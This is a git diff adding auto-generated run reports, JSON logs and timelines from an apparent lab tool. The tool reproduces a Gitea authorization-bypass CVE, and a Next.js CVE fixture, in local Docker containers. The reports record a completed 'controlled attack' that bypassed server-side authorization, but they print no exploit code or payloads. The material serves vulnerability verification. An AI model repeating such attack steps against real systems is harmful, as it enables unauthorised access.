+  "elapsed_seconds": 0.0,
+  "observations": [
+    {
+      "url": "http://127.0.0.1:18103/",
+      "status_code": 200
+    }
+  ],
+  "compose_path": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/compose/compose.yaml"
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/seed.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/seed.json
new file mode 100644
index 00000000..e03884a3
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/seed.json
@@ -0,0 +1,21 @@
+{
+  "steps": [
+    {
+      "kind": "runner",
+      "tool": "gitea.authz-bypass",
+      "status": "completed",
+      "status_code": 200,
+      "detail": "fixture seeded"
+    }
+  ],
+  "seeded": true,
+  "result": {
+    "status_code": 200,
+    "ok": true,
+    "body": {
+      "ok": true,
+      "detail": "fixture seeded",
+      "case_id": "gitea--CVE-2025-68940"
+    }
+  }
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/report.html b/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/report.html
new file mode 100644
index 00000000..29f63790
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/report.html
@@ -0,0 +1,45 @@
+<!doctype html>
+<html><head><meta charset='utf-8'><title>websafe 运行报告</title>
+<style>body{font-family:ui-sans-serif,system-ui,sans-serif;margin:2rem;line-height:1.55;background:#f8fafc;color:#0f172a;} code,pre{background:#e2e8f0;padding:.2rem .4rem;border-radius:.3rem;} pre{white-space:pre-wrap;} .grid{display:grid;grid-template-columns:repeat(2,minmax(0,1fr));gap:1rem;} .card{border:1px solid #cbd5e1;padding:1rem;border-radius:.75rem;background:#fff;} table{width:100%;border-collapse:collapse;background:#fff;border:1px solid #cbd5e1;border-radius:.75rem;overflow:hidden;} th,td{padding:.75rem;border-bottom:1px solid #e2e8f0;text-align:left;vertical-align:top;} img{max-width:100%;border:1px solid #cbd5e1;border-radius:.5rem;} .gallery{display:grid;grid-template-columns:repeat(auto-fit,minmax(320px,1fr));gap:1rem;}</style>
+</head><body>
+<h1>运行 gitea-gitea--CVE-2025-68940-20260318012708</h1>
+<div class='grid'>
+<div class='card'><strong>漏洞条目</strong><br><code>gitea--CVE-2025-68940</code></div>
+<div class='card'><strong>实证状态</strong><br><code>verified-real</code></div>
+<div class='card'><strong>复现 Profile</strong><br><code>gitea-authz-bypass</code></div>
+<div class='card'><strong>Artifact 模式</strong><br><code>local-fixture</code></div>
+</div>
+<h2>Mermaid 时间线</h2>
+<pre>flowchart LR
+A[&quot;选择 Advisory&quot;] --&gt; B[&quot;解析 Repro Profile&quot;]
+B --&gt; C[&quot;生成 Compose 环境&quot;]
+C --&gt; D[&quot;采集基线快照&quot;]
+D --&gt; E[&quot;执行受控攻击步骤&quot;]
+E --&gt; F[&quot;浏览器回放验证&quot;]
+F --&gt; G[&quot;收集日志与证据&quot;]
+G --&gt; H[&quot;回写 Registry 与报告&quot;]</pre>
+<h2>运行时间线</h2>
+<table><thead><tr><th>时间</th><th>步骤</th><th>状态</th><th>说明</th></tr></thead><tbody>
+<tr><td><code>2026-03-18T01:27:08+00:00</code></td><td><code>select-advisory</code></td><td><code>completed</code></td><td>gitea--CVE-2025-68940</td></tr>
+<tr><td><code>2026-03-18T01:27:08+00:00</code></td><td><code>resolve-repro-profile</code></td><td><code>completed</code></td><td>gitea-authz-bypass</td></tr>
+<tr><td><code>2026-03-18T01:27:08+00:00</code></td><td><code>doctor</code></td><td><code>completed</code></td><td>all checks passed</td></tr>
+<tr><td><code>2026-03-18T01:27:11+00:00</code></td><td><code>provision-compose-environment</code></td><td><code>ready</code></td><td>-</td></tr>
+<tr><td><code>2026-03-18T01:27:11+00:00</code></td><td><code>wait-ready</code></td><td><code>completed</code></td><td>baseline urls ready (1)</td></tr>
+<tr><td><code>2026-03-18T01:27:11+00:00</code></td><td><code>seed-environment</code></td><td><code>completed</code></td><td>steps=1</td></tr>
+<tr><td><code>2026-03-18T01:27:11+00:00</code></td><td><code>baseline-snapshot</code></td><td><code>completed</code></td><td>urls=1</td></tr>
+<tr><td><code>2026-03-18T01:27:11+00:00</code></td><td><code>controlled-attack-chain</code></td><td><code>completed</code></td><td>steps=1</td></tr>
+<tr><td><code>2026-03-18T01:27:11+00:00</code></td><td><code>collect-logs-and-evidence</code></td><td><code>completed</code></td><td>container_logs=1</td></tr>
+<tr><td><code>2026-03-18T01:27:12+00:00</code></td><td><code>cleanup-compose-environment</code></td><td><code>completed</code></td><td>docker compose down completed</td></tr>
+<tr><td><code>2026-03-18T01:27:12+00:00</code></td><td><code>update-registry-and-reports</code></td><td><code>completed</code></td><td>gitea-gitea--CVE-2025-68940-20260318012708</td></tr>
+</tbody></table>
+<h2>攻击步骤</h2>
+<table><thead><tr><th>工具</th><th>状态</th><th>输出</th></tr></thead><tbody>
+<tr><td><code>gitea.authz-bypass</code></td><td><code>completed</code></td><td><code>/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/attack.json</code></td></tr>
+</tbody></table>
+<h2>证据清单</h2><ul>
+<li><code>compose/compose.yaml</code></li>
+<li><code>logs/docker/app.log</code></li>
+<li><code>logs/attack.json</code></li>
+<li><code>logs/baseline.json</code></li>
+</ul>
+</body></html>
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/report.md b/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/report.md
new file mode 100644
index 00000000..8a798881
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/report.md
@@ -0,0 +1,66 @@
+# 运行 gitea-gitea--CVE-2025-68940-20260318012708
+
+> `LAB ONLY` | `AUTHORIZED TARGETS ONLY` | 自动生成 run bundle
+
+- 漏洞条目: `gitea--CVE-2025-68940`
+- 系统: `gitea`
+- Repro Profile: `gitea-authz-bypass`
+- 实证状态: `verified-real`
+- 实证方式: `real`
+- Artifact 模式: `local-fixture`
+- 启动时间: `2026-03-18T01:27:08+00:00`
+- 完成时间: `2026-03-18T01:27:12+00:00`
+- 阻塞原因: `-`
+- Compose 服务: `app`
+
+## 运行时间线
+
+- Mermaid: [timeline.mmd](/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/timeline.mmd)
+
+| 时间 | 步骤 | 状态 | 说明 |
+|------|------|------|------|
+| `2026-03-18T01:27:08+00:00` | `select-advisory` | `completed` | gitea--CVE-2025-68940 |
+| `2026-03-18T01:27:08+00:00` | `resolve-repro-profile` | `completed` | gitea-authz-bypass |
+| `2026-03-18T01:27:08+00:00` | `doctor` | `completed` | all checks passed |
+| `2026-03-18T01:27:11+00:00` | `provision-compose-environment` | `ready` | - |
+| `2026-03-18T01:27:11+00:00` | `wait-ready` | `completed` | baseline urls ready (1) |
+| `2026-03-18T01:27:11+00:00` | `seed-environment` | `completed` | steps=1 |
+| `2026-03-18T01:27:11+00:00` | `baseline-snapshot` | `completed` | urls=1 |
+| `2026-03-18T01:27:11+00:00` | `controlled-attack-chain` | `completed` | steps=1 |
+| `2026-03-18T01:27:11+00:00` | `collect-logs-and-evidence` | `completed` | container_logs=1 |
+| `2026-03-18T01:27:12+00:00` | `cleanup-compose-environment` | `completed` | docker compose down completed |
+| `2026-03-18T01:27:12+00:00` | `update-registry-and-reports` | `completed` | gitea-gitea--CVE-2025-68940-20260318012708 |
+
+## Compose 拓扑
+
+- Compose 文件: `/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/compose/compose.yaml`
+- 服务列表: `app`
+
+## 攻击步骤
+
+| 工具/步骤 | 状态 | 结果 |
+|-----------|------|------|
+| `gitea.authz-bypass` | `completed` | `/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/attack.json` |
+
+## 证据摘要
+
+- Baseline: `1`
+- 攻击步骤: `1`
+- 浏览器证据: `0`
+- 容器日志: `1`
+- 请求日志: `2`
+
+## 容器日志
+
+- `logs/docker/app.log`
+
+## 请求与基线日志
+
+- `logs/attack.json`
+- `logs/baseline.json`
+
+## 最小化验证说明
+
+- 仅限自有资产、本地靶场或已授权实验目标。
+- 默认执行 minimal-proof；不会把破坏性或不可回滚动作作为默认路径。
+- 若浏览器证据缺失，前端类案例不会被标为 `verified-*`。
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/run.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/run.json
new file mode 100644
index 00000000..1662de0a
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/run.json
@@ -0,0 +1,145 @@
+{
+  "run_id": "gitea-gitea--CVE-2025-68940-20260318012708",
+  "system_id": "gitea",
+  "advisory_id": "gitea--CVE-2025-68940",
+  "repro_profile_id": "gitea-authz-bypass",
+  "verification_status": "verified-real",
+  "verification_mode": "real",
+  "artifact_mode": "local-fixture",
+  "target_env": "local-docker",
+  "compose_services": [
+    "app"
+  ],
+  "baseline_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/baseline.json"
+  ],
+  "attack_steps": [
+    {
+      "kind": "runner",
+      "tool": "gitea.authz-bypass",
+      "status": "completed",
+      "status_code": 200,
+      "result_path": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/attack.json"
+    }
+  ],
+  "browser_refs": [],
+  "browser_evidence": {
+    "required": false,
+    "present": false,
+    "refs": [],
+    "baseline_refs": [],
+    "proof_refs": [],
+    "baseline_title": null,
+    "proof_title": null,
+    "error_kind": null,
+    "reason": null
+  },
+  "container_log_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/docker/app.log"
+  ],
+  "request_log_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/attack.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/logs/baseline.json"
+  ],
+  "compose_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/compose/compose.yaml"
+  ],
+  "timeline": [
+    {
+      "at": "2026-03-18T01:27:08+00:00",
+      "step": "select-advisory",
+      "status": "completed",
+      "detail": "gitea--CVE-2025-68940"
+    },
+    {
+      "at": "2026-03-18T01:27:08+00:00",
+      "step": "resolve-repro-profile",
+      "status": "completed",
+      "detail": "gitea-authz-bypass"
+    },
+    {
+      "at": "2026-03-18T01:27:08+00:00",
+      "step": "doctor",
+      "status": "completed",
+      "detail": "all checks passed"
+    },
+    {
+      "at": "2026-03-18T01:27:11+00:00",
+      "step": "provision-compose-environment",
+      "status": "ready",
+      "detail": ""
+    },
+    {
+      "at": "2026-03-18T01:27:11+00:00",
+      "step": "wait-ready",
+      "status": "completed",
+      "detail": "baseline urls ready (1)"
+    },
+    {
+      "at": "2026-03-18T01:27:11+00:00",
+      "step": "seed-environment",
+      "status": "completed",
+      "detail": "steps=1"
+    },
+    {
+      "at": "2026-03-18T01:27:11+00:00",
+      "step": "baseline-snapshot",
+      "status": "completed",
+      "detail": "urls=1"
+    },
+    {
+      "at": "2026-03-18T01:27:11+00:00",
+      "step": "controlled-attack-chain",
+      "status": "completed",
+      "detail": "steps=1"
+    },
+    {
+      "at": "2026-03-18T01:27:11+00:00",
+      "step": "collect-logs-and-evidence",
+      "status": "completed",
+      "detail": "container_logs=1"
+    },
+    {
+      "at": "2026-03-18T01:27:12+00:00",
+      "step": "cleanup-compose-environment",
+      "status": "completed",
+      "detail": "docker compose down completed"
+    },
+    {
+      "at": "2026-03-18T01:27:12+00:00",
+      "step": "update-registry-and-reports",
+      "status": "completed",
+      "detail": "gitea-gitea--CVE-2025-68940-20260318012708"
+    }
+  ],
+  "success_evaluation": {
+    "passed": true,
+    "verification_status": "verified-real",
+    "blocked_reason": null,
+    "assertions": [
+      {
+        "name": "baseline-ok",
+        "kind": "baseline-ok",
+        "passed": true,
+        "detail": "baseline URLs responded without 5xx or transport errors"
+      },
+      {
+        "name": "runner-success",
+        "kind": "runner-success",
+        "passed": true,
+        "detail": "server-side authorization recheck was bypassed"
+      }
+    ]
+  },
+  "historical_status": "verified-real",
+  "latest_status": "verified-real",
+  "started_at": "2026-03-18T01:27:08+00:00",
+  "finished_at": "2026-03-18T01:27:12+00:00",
+  "blocked_reason": null,
+  "report_refs": {
+    "bundle_dir": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708",
+    "report_md": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/report.md",
+    "report_html": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/report.html",
+    "timeline": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/timeline.mmd"
+  }
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/timeline.mmd b/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/timeline.mmd
new file mode 100644
index 00000000..71155437
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2025-68940-20260318012708/timeline.mmd
@@ -0,0 +1,8 @@
+flowchart LR
+A["选择 Advisory"] --> B["解析 Repro Profile"]
+B --> C["生成 Compose 环境"]
+C --> D["采集基线快照"]
+D --> E["执行受控攻击步骤"]
+E --> F["浏览器回放验证"]
+F --> G["收集日志与证据"]
+G --> H["回写 Registry 与报告"]
diff --git a/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/baseline-dom.html b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/baseline-dom.html
new file mode 100644
index 00000000..e4ece595
--- /dev/null
+++ b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/baseline-dom.html
@@ -0,0 +1,26 @@
+<!DOCTYPE html><html lang="zh-CN"><head>
+  <meta charset="utf-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1">
+  <title>Next.js Proxy Boundary Fixture</title>
+  <style>
+    body { font-family: sans-serif; background: #0f172a; color: #e2e8f0; margin: 0; padding: 32px; }
+    main { max-width: 900px; margin: 0 auto; background: #111827; border: 1px solid #334155; border-radius: 16px; padding: 24px; }
+    .proof { padding: 14px; border-radius: 12px; background: #14532d; color: #dcfce7; }
+    .baseline { padding: 14px; border-radius: 12px; background: #1e3a8a; color: #dbeafe; }
+    code { background: rgba(255,255,255,0.08); padding: 2px 6px; border-radius: 6px; }
+  </style>
+</head>
+<body>
+  <main>
+    <h1>Next.js Proxy Boundary Fixture</h1>
+    <p>Middleware trust-boundary fixture with forwarded-header proof.</p>
+    <div class="baseline">Baseline ready</div>
+    <p>System: <code>nextjs</code> / Family: <code>proxy-boundary</code></p>
+    
+    
+    
+    
+    
+  </main>
+
+</body></html>
\ No newline at end of file
diff --git a/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/baseline.png b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/baseline.png
new file mode 100644
index 0000000000000000000000000000000000000000..b8e02c2d8874fce22d0cd23b16e087a6424913c1
GIT binary patch
literal 28395
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
